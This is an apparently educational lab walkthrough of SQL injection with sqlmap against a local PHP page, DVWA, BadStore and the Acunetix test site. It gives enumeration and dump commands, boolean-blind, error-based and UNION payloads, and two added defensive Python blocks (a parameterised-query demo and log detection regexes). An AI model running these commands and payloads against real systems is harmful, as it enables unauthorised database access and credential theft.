Injection 2
Contents
1. Local Attack
   C) Tables
   D) Columns
   E) Table Contents
2. DVWA
   Installation
3. BadStore
   B) Database Name
   C) Tables
   D) Columns
4. Acunetix
   B) Database Name
   C) Tables
   D) Columns
1. Local Attack
We are going to carry out a SQL injection attack against the page from the previous exercise, the one we used to run a query against our MySQL database.
A) Database Server and Version
First we find out the type of database server and its version; for this we use sqlmap's -b option:
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 -b

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[13:57:26] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[13:57:26] [INFO] testing connection to the target url
[13:57:26] [INFO] testing if the url is stable, wait a few seconds
[13:57:27] [INFO] url is stable
[13:57:27] [INFO] testing if GET parameter 'id' is dynamic
[13:57:27] [INFO] confirming that GET parameter 'id' is dynamic
[13:57:27] [INFO] GET parameter 'id' is dynamic
[13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[13:57:28] [INFO] testing sql injection on GET parameter 'id'
[13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:57:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:57:38] [INFO] target url appears to be UNION injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656
In this step the program has tried each of the possible techniques in turn in order to identify the type of server:
[…]
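To see what sqlmap's boolean-based blind probe (the `id=1 AND 6656=6656` payload above) actually relies on, here is an added example, not code from the write-up: a Python/sqlite3 stand-in for consulta.php that builds the query by string concatenation, next to a hardened version that validates and binds the parameter. The usuarios table, its column names and its rows are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the asir1.usuarios table the write-up dumps;
# the three columns are an assumption (sqlmap only reported "3 columns").
def _abrir_bd():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE usuarios (id INTEGER, usuario TEXT, clave TEXT)")
    con.executemany("INSERT INTO usuarios VALUES (?, ?, ?)",
                    [(1, "admin", "s3cr3t"), (2, "alumno", "asir1")])
    return con

def consulta_vulnerable(id_param):
    """Mirrors consulta.php?id=...: the raw GET value is glued into the SQL text,
    so 'id=1 AND 6656=6656' keeps the row and 'id=1 AND 6656=6657' drops it.
    That observable difference is the oracle the boolean-based blind test uses."""
    con = _abrir_bd()
    sql = "SELECT id, usuario FROM usuarios WHERE id = " + id_param
    return con.execute(sql).fetchall()

def consulta_segura(id_param):
    """Hardened form: reject anything that is not an integer, then bind the value
    as a parameter so it is never parsed as SQL. Returns None for rejected input."""
    try:
        id_num = int(id_param)
    except (TypeError, ValueError):
        return None  # a real handler would answer HTTP 400 here
    con = _abrir_bd()
    return con.execute("SELECT id, usuario FROM usuarios WHERE id = ?",
                       (id_num,)).fetchall()

if __name__ == "__main__":
    for p in ("1", "1 AND 6656=6656", "1 AND 6656=6657"):
        print(repr(p), consulta_vulnerable(p), consulta_segura(p))
```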
B) Database Name
This is the first step towards extracting all the information we can from our target, since from here on we will work our way step by step deeper into the database.
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --current-db
C) Tables
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --tables -D asir1
D) Columns
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --columns -T usuarios -D asir1
E) Table Contents
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dump -T usuarios -D asir1
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dbs
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --users
We are using the root user that MySQL ships with by default to connect from PHP.
If our SQL statements run as the root user, that means the application can also make calls to the system:
2. DVWA
http://127.0.0.1/dvwa/
We check that the vulnerability exists:
1' or '1'='1' union select password, first_name from users where first_name='admin
http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA
3. BadStore
If we type a double quote (") in the search field we get an error response from the SQL server, which lets us anticipate a SQL injection vulnerability.
A) Database Server and Version
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b
B) Database Name
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db
The name of the database is badstoredb.
C) Tables
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb
Database: badstoredb
[1 table]
+--------+
| itemdb |
+--------+
D) Columns
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --columns -T itemdb -D badstoredb
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| price  | numeric |
| qty    | numeric |
+--------+---------+
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
4. Acunetix
We open the site and, after browsing around a little, we see in the categories section that the URL carries ?cat=1, which is a clue worth checking.
http://testphp.vulnweb.com/listproducts.php?cat=1
A) Database Server and Version
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
B) Database Name
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
D) Columns
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
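From the defender's side, the probes shown throughout this write-up leave recognisable traces in the web server's access log. The following added example (not part of the original document) parses combined-format log lines and flags the request patterns seen here: sqlmap's `AND n=n` boolean probe, its `UNION ... SELECT NULL` column counting, the information_schema GROUP BY error-based payload, the hand-typed `or '1'='1'` tautology, and the sqlmap User-Agent. The log lines, their dates, sizes and client addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the requests sqlmap 0.9 and the manual DVWA test issued above.
PATRONES = {
    "boolean-blind": re.compile(r"\bAND\s+\d+=\d+", re.I),
    "error-based":   re.compile(r"information_schema\.tables\s+GROUP\s+BY", re.I),
    "union":         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "tautology":     re.compile(r"\bOR\s+'[^']*'='", re.I),
}
# Apache/nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

def analizar_linea(linea):
    """Return {'ip', 'ruta', 'hallazgos'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(linea)
    if not m:
        return None
    ip, _metodo, ruta, _estado, ua = m.groups()
    decodificada = unquote_plus(ruta)  # match against the URL-decoded query string
    hallazgos = [nombre for nombre, pat in PATRONES.items() if pat.search(decodificada)]
    if "sqlmap" in ua.lower():
        hallazgos.append("sqlmap-ua")  # the tool identifies itself unless the UA is changed
    return {"ip": ip, "ruta": ruta, "hallazgos": hallazgos}

def analizar_log(lineas):
    """Keep only the lines that triggered at least one signature."""
    alertas = []
    for linea in lineas:
        r = analizar_linea(linea)
        if r and r["hallazgos"]:
            alertas.append(r)
    return alertas

# Constructed sample lines modelled on the requests in this write-up (not real log data).
LOG_MUESTRA = [
    '127.0.0.1 - - [01/Jan/2011:13:57:27 +0000] "GET /ejerPHP/SQL_Injection/consulta.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Jan/2011:13:57:28 +0000] "GET /ejerPHP/SQL_Injection/consulta.php?id=1%20AND%206656%3D6656 HTTP/1.1" 200 512 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '127.0.0.1 - - [01/Jan/2011:13:57:38 +0000] "GET /ejerPHP/SQL_Injection/consulta.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL HTTP/1.1" 200 700 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '127.0.0.1 - - [01/Jan/2011:14:02:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+or+%271%27%3D%271%27+union+select+password,+first_name+from+users&Submit=Submit HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2011:15:10:00 +0000] "GET /listproducts.php?cat=1%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables%20GROUP%20BY%20x) HTTP/1.1" 500 300 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
]
```

Run over a real log, the same function lets you correlate the alerts by client address and time to recover the whole probing sequence sqlmap printed above.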